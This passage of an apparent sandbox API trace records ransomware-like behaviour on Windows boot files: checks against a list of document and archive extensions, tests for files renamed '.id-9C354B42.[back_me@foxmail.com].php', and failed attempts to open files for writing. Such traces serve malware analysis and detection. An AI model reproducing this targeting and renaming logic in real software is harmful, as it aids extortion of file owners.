lstrlenW (lpString=".pdf") returned 4 [0035.470] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.470] lstrlenW (lpString=".xls") returned 4 [0035.470] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.470] lstrlenW (lpString=".xlsx") returned 5 [0035.470] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.470] lstrlenW (lpString=".ppt") returned 4 [0035.470] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.470] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.470] lstrlenW (lpString=".zip") returned 4 [0035.470] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.470] lstrlenW (lpString=".rar") returned 4 [0035.470] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.470] lstrlenW (lpString=".bz2") returned 4 [0035.470] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.470] lstrlenW (lpString=".7z") returned 3 [0035.470] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.470] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.470] lstrlenW (lpString=".dbf") returned 4 [0035.470] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.470] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.470] lstrlenW (lpString=".1cd") returned 4 [0035.470] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.470] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.470] lstrlenW (lpString=".jpg") returned 4 [0035.470] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.470] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.471] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.471] lstrlenW (lpString=".doc") returned 4 [0035.471] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.471] lstrlenW (lpString=".docx") returned 5 [0035.471] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.471] lstrlenW (lpString=".pdf") returned 4 [0035.471] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.471] lstrlenW (lpString=".xls") returned 4 [0035.471] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.471] lstrlenW (lpString=".xlsx") returned 5 [0035.471] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.471] lstrlenW (lpString=".ppt") returned 4 [0035.471] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.471] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.471] lstrlenW (lpString=".zip") returned 4 [0035.471] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.471] lstrlenW (lpString=".rar") returned 4 [0035.471] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.471] lstrlenW (lpString=".bz2") returned 4 [0035.471] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.471] lstrlenW (lpString=".7z") returned 3 [0035.471] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.471] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.471] lstrlenW (lpString=".dbf") returned 4 [0035.471] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.471] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.471] lstrlenW (lpString=".1cd") returned 4 [0035.471] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.471] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.471] lstrlenW (lpString=".jpg") returned 4 [0035.471] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.472] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.472] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.472] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.472] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=90688) returned 1 [0035.472] CloseHandle (hObject=0x1a8) returned 1 [0035.472] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0035.472] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.472] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.472] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.472] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.472] lstrlenW (lpString=".doc") returned 4 [0035.472] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.472] lstrlenW (lpString=".docx") returned 5 [0035.472] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.472] lstrlenW (lpString=".pdf") returned 4 [0035.472] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.472] lstrlenW (lpString=".xls") returned 4 [0035.472] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.472] lstrlenW (lpString=".xlsx") returned 5 [0035.472] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.472] lstrlenW (lpString=".ppt") returned 4 [0035.472] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.472] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.472] lstrlenW (lpString=".zip") returned 4 [0035.473] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.473] lstrlenW (lpString=".rar") returned 4 [0035.473] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.473] lstrlenW (lpString=".bz2") returned 4 [0035.473] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.473] lstrlenW (lpString=".7z") returned 3 [0035.473] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.473] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.473] lstrlenW (lpString=".dbf") returned 4 [0035.473] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.473] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.473] lstrlenW (lpString=".1cd") returned 4 [0035.473] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.473] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.473] lstrlenW (lpString=".jpg") returned 4 [0035.473] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.473] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.473] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.473] lstrlenW (lpString=".doc") returned 4 [0035.473] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.473] lstrlenW (lpString=".docx") returned 5 [0035.473] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.473] lstrlenW (lpString=".pdf") returned 4 [0035.473] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.473] lstrlenW (lpString=".xls") returned 4 [0035.473] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.473] lstrlenW (lpString=".xlsx") returned 5 [0035.473] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.473] lstrlenW (lpString=".ppt") returned 4 [0035.473] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.473] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.473] lstrlenW (lpString=".zip") returned 4 [0035.473] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.473] lstrlenW (lpString=".rar") returned 4 [0035.474] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.474] lstrlenW (lpString=".bz2") returned 4 [0035.474] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.474] lstrlenW (lpString=".7z") returned 3 [0035.474] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.474] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.474] lstrlenW (lpString=".dbf") returned 4 [0035.474] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.474] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.474] lstrlenW (lpString=".1cd") returned 4 [0035.474] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.474] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.474] lstrlenW (lpString=".jpg") returned 4 [0035.474] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.474] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.474] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.474] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.474] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=90704) returned 1 [0035.474] CloseHandle (hObject=0x1a8) returned 1 [0035.474] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0035.474] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.475] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.475] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.475] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.475] lstrlenW (lpString=".doc") returned 4 [0035.475] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.475] lstrlenW (lpString=".docx") returned 5 [0035.475] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.475] lstrlenW (lpString=".pdf") returned 4 [0035.475] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.475] lstrlenW (lpString=".xls") returned 4 [0035.475] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.475] lstrlenW (lpString=".xlsx") returned 5 [0035.475] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.475] lstrlenW (lpString=".ppt") returned 4 [0035.475] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.475] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.475] lstrlenW (lpString=".zip") returned 4 [0035.475] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.475] lstrlenW (lpString=".rar") returned 4 [0035.475] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.475] lstrlenW (lpString=".bz2") returned 4 [0035.475] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.475] lstrlenW (lpString=".7z") returned 3 [0035.475] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.475] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.475] lstrlenW (lpString=".dbf") returned 4 [0035.475] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.475] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.475] lstrlenW (lpString=".1cd") returned 4 [0035.475] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.475] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.475] lstrlenW (lpString=".jpg") returned 4 [0035.475] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.476] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.476] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.476] lstrlenW (lpString=".doc") returned 4 [0035.476] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.476] lstrlenW (lpString=".docx") returned 5 [0035.476] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.476] lstrlenW (lpString=".pdf") returned 4 [0035.476] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.476] lstrlenW (lpString=".xls") returned 4 [0035.476] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.476] lstrlenW (lpString=".xlsx") returned 5 [0035.476] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.476] lstrlenW (lpString=".ppt") returned 4 [0035.476] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.476] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.476] lstrlenW (lpString=".zip") returned 4 [0035.476] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.476] lstrlenW (lpString=".rar") returned 4 [0035.476] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.476] lstrlenW (lpString=".bz2") returned 4 [0035.476] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.476] lstrlenW (lpString=".7z") returned 3 [0035.476] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.476] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.476] lstrlenW (lpString=".dbf") returned 4 [0035.476] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.476] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.476] lstrlenW (lpString=".1cd") returned 4 [0035.476] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.476] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.476] lstrlenW (lpString=".jpg") returned 4 [0035.476] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.477] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.477] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.477] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.478] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=76352) returned 1 [0035.478] CloseHandle (hObject=0x1a8) returned 1 [0035.479] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0035.479] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.479] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.479] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.479] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.479] lstrlenW (lpString=".doc") returned 4 [0035.479] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.479] lstrlenW (lpString=".docx") returned 5 [0035.479] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.479] lstrlenW (lpString=".pdf") returned 4 [0035.479] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.479] lstrlenW (lpString=".xls") returned 4 [0035.479] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.479] lstrlenW (lpString=".xlsx") returned 5 [0035.479] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.479] lstrlenW (lpString=".ppt") returned 4 [0035.479] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.479] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.479] lstrlenW (lpString=".zip") returned 4 [0035.479] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.479] lstrlenW (lpString=".rar") returned 4 [0035.479] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.479] lstrlenW (lpString=".bz2") returned 4 [0035.479] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.479] lstrlenW (lpString=".7z") returned 3 [0035.479] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.479] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.479] lstrlenW (lpString=".dbf") returned 4 [0035.479] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.479] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.479] lstrlenW (lpString=".1cd") returned 4 [0035.480] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.480] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.480] lstrlenW (lpString=".jpg") returned 4 [0035.480] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.480] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.480] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.480] lstrlenW (lpString=".doc") returned 4 [0035.480] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.480] lstrlenW (lpString=".docx") returned 5 [0035.480] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.480] lstrlenW (lpString=".pdf") returned 4 [0035.480] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.480] lstrlenW (lpString=".xls") returned 4 [0035.480] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.480] lstrlenW (lpString=".xlsx") returned 5 [0035.480] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.480] lstrlenW (lpString=".ppt") returned 4 [0035.480] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.480] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.480] lstrlenW (lpString=".zip") returned 4 [0035.480] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.480] lstrlenW (lpString=".rar") returned 4 [0035.480] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.480] lstrlenW (lpString=".bz2") returned 4 [0035.480] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.480] lstrlenW (lpString=".7z") returned 3 [0035.480] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.480] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.480] lstrlenW (lpString=".dbf") returned 4 [0035.480] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.480] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.480] lstrlenW (lpString=".1cd") returned 4 [0035.480] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.480] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.480] lstrlenW (lpString=".jpg") returned 4 [0035.481] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.481] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0035.481] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.481] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.481] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=75344) returned 1 [0035.481] CloseHandle (hObject=0x1a8) returned 1 [0035.481] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0035.481] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.481] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.481] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.481] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.481] lstrlenW (lpString=".doc") returned 4 [0035.481] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.481] lstrlenW (lpString=".docx") returned 5 [0035.481] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.481] lstrlenW (lpString=".pdf") returned 4 [0035.481] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.481] lstrlenW (lpString=".xls") returned 4 [0035.482] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.482] lstrlenW (lpString=".xlsx") returned 5 [0035.482] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.482] lstrlenW (lpString=".ppt") returned 4 [0035.482] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.482] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.482] lstrlenW (lpString=".zip") returned 4 [0035.482] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.482] lstrlenW (lpString=".rar") returned 4 [0035.482] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.482] lstrlenW (lpString=".bz2") returned 4 [0035.482] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.482] lstrlenW (lpString=".7z") returned 3 [0035.482] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.482] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.482] lstrlenW (lpString=".dbf") returned 4 [0035.482] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.482] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.482] lstrlenW (lpString=".1cd") returned 4 [0035.482] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.482] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.482] lstrlenW (lpString=".jpg") returned 4 [0035.482] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.482] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.482] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.482] lstrlenW (lpString=".doc") returned 4 [0035.482] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.482] lstrlenW (lpString=".docx") returned 5 [0035.482] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.482] lstrlenW (lpString=".pdf") returned 4 [0035.482] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.482] lstrlenW (lpString=".xls") returned 4 [0035.482] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.483] lstrlenW (lpString=".xlsx") returned 5 [0035.483] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.483] lstrlenW (lpString=".ppt") returned 4 [0035.483] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.483] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.483] lstrlenW (lpString=".zip") returned 4 [0035.483] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.483] lstrlenW (lpString=".rar") returned 4 [0035.483] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.483] lstrlenW (lpString=".bz2") returned 4 [0035.483] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.483] lstrlenW (lpString=".7z") returned 3 [0035.483] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.483] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.483] lstrlenW (lpString=".dbf") returned 4 [0035.483] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.483] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.483] lstrlenW (lpString=".1cd") returned 4 [0035.483] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.483] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.483] lstrlenW (lpString=".jpg") returned 4 [0035.483] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.483] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0035.483] lstrlenW (lpString="memtest.exe") returned 11 [0035.483] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.484] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=485760) returned 1 [0035.484] CloseHandle (hObject=0x1a8) returned 1 [0035.484] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0035.484] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.484] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.484] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.484] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.484] lstrlenW (lpString=".doc") returned 4 [0035.484] lstrcmpiW (lpString1=".doc", 